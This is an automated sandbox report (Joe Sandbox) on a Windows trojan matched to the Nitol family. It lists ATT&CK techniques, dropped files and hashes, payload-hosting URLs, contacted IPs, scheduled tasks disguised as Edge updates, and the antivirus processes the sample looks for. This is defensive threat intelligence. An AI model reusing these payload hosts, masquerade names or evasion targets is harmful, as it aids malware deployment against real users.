Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: 7tqorj.exe, 00000005.00000002.2717314493.0000000002898000.00000002.00001000.00020000.00000000.sdmp, 7tqorj.exe, 00000006.00000002.2727392092.0000000002848000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 41.2.qNHTRl.exe.42403e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.qNHTRl.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.qNHTRl.exe.42403e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 41.2.qNHTRl.exe.42403e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.qNHTRl.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.qNHTRl.exe.42403e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR

Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		5_2_00000001400042B0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		5_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 DLL Side-Loading	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	32 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	1 Modify Registry	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2749837485743-7684385786.05.exe	3%	ReversingLabs
2749837485743-7684385786.05.exe	3%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\2U36F\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\qNHTRl\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\2U36F\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\qNHTRl\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\2U36F\NroRNr.exe	0%	ReversingLabs
C:\Program Files (x86)\qNHTRl\qNHTRl.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\7tqorj.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif2	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://%s/%d.dll	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU5	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	unknown
sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.26	true	false	unknown
oheykp.net	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown
hu5wd1.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51	7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	false		high
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	false		high
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif2	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rarC:	qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	false		high
http://www.symauth.com/rpa00	2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	false		high
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU5	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txt	qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp	2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.217.59.73	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
39.103.20.26	sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584634
Start date and time:	2025-01-06 04:49:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2749837485743-7684385786.05.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@65/29@14/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 61% Number of executed functions: 12 Number of non-executed functions: 111
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 7tqorj.exe, PID 504 because there are no executed function
Execution Graph export aborted for target qNHTRl.exe, PID 5052 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:50:54	Task Scheduler	Run new task: ovvqa path: C:\Users\user\Documents\7tqorj.exe
04:51:49	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 6niIP path: C:\Program Files (x86)\2U36F\NroRNr.exe
04:51:49	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 LkMaj path: C:\Program Files (x86)\qNHTRl\qNHTRl.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.9	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse
	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	45631.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	0000000000000000.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	cZO.exe	Get hash	malicious	Unknown	Browse	120.77.100.135
	z0r0.m68k.elf	Get hash	malicious	Mirai	Browse	8.133.115.153
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.34
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.34
	N5kEzgUBn6.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	101.201.227.94
	N5kEzgUBn6.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	101.201.227.94
	3.elf	Get hash	malicious	Unknown	Browse	8.189.180.251
	3.elf	Get hash	malicious	Unknown	Browse	8.138.48.163
	armv6l.elf	Get hash	malicious	Unknown	Browse	223.4.27.34
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	cZO.exe	Get hash	malicious	Unknown	Browse	120.77.100.135
	z0r0.m68k.elf	Get hash	malicious	Mirai	Browse	8.133.115.153
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.34
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.34
	N5kEzgUBn6.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	101.201.227.94
	N5kEzgUBn6.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	101.201.227.94
	3.elf	Get hash	malicious	Unknown	Browse	8.189.180.251
	3.elf	Get hash	malicious	Unknown	Browse	8.138.48.163
	armv6l.elf	Get hash	malicious	Unknown	Browse	223.4.27.34
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	8.213.155.157
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	47.245.235.159
	z0r0.x86.elf	Get hash	malicious	Mirai	Browse	8.209.129.226
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	8.217.47.169
	armv7l.elf	Get hash	malicious	Unknown	Browse	8.212.89.249
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	47.235.55.179
	file.exe	Get hash	malicious	XRed	Browse	47.254.187.72
	file.exe	Get hash	malicious	XRed	Browse	47.254.187.72
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	47.253.61.56
	45631.exe	Get hash	malicious	Nitol	Browse	8.217.152.240

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	39.103.20.26 118.178.60.9
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	39.103.20.26 118.178.60.9
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	39.103.20.26 118.178.60.9
	setup.msi	Get hash	malicious	Unknown	Browse	39.103.20.26 118.178.60.9
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	39.103.20.26 118.178.60.9
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.26 118.178.60.9
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	39.103.20.26 118.178.60.9
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	39.103.20.26 118.178.60.9
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	39.103.20.26 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\2U36F\NroRNr.exe	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse
	0000000000000000.exe	Get hash	malicious	Nitol	Browse
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse
	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\2U36F\NroRNr.exe

Download File

Process:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse Filename: 45631.exe, Detection: malicious, Browse Filename: 0000000000000000.exe, Detection: malicious, Browse Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: setup.ic19.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\2U36F\log.src

Download File

Process:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955227108233
Encrypted:	true
SSDEEP:	98304:AOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:3o6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	459D7F1351A247F7AB2544C0F8D8B4FC
SHA1:	44C57787D5D1BC35F449F0E154D7FA748A0AB6C9
SHA-256:	581D65B434E74483632B37BEB7454D155F1803D1C4EA5750B554E359A2ECDBAD
SHA-512:	EA0C60C7C7D69780751C4D4B41E4CFF386517A7CABAC498BD717B515FF8A831BC716A8C37C8416495C01FA928DD00E9CA74BB53D5258758DA1A411B9F1958E26
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\2U36F\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516680863906
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/w:9S4+O6P5OeMRrjRy7aPZbm3k8V/w
MD5:	4FFB2C2E6EDC14EB645611E51DA253BF
SHA1:	78C885A68296573B73E545DB32601F5CE056AA74
SHA-256:	5400FE2A066D658F2054C8234834CEB064DDD636ADD8DC452AF2059B674FDFE7
SHA-512:	272CFBA78489C27FA98C9BFB7E39B5E80EE392A7CB13243B808FCA4E1E4D6AD03DE503D3C079FE897EC2C21DBFA9DA85BF8FAA7E4106801A6A3CB3B0CCA1A9E9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
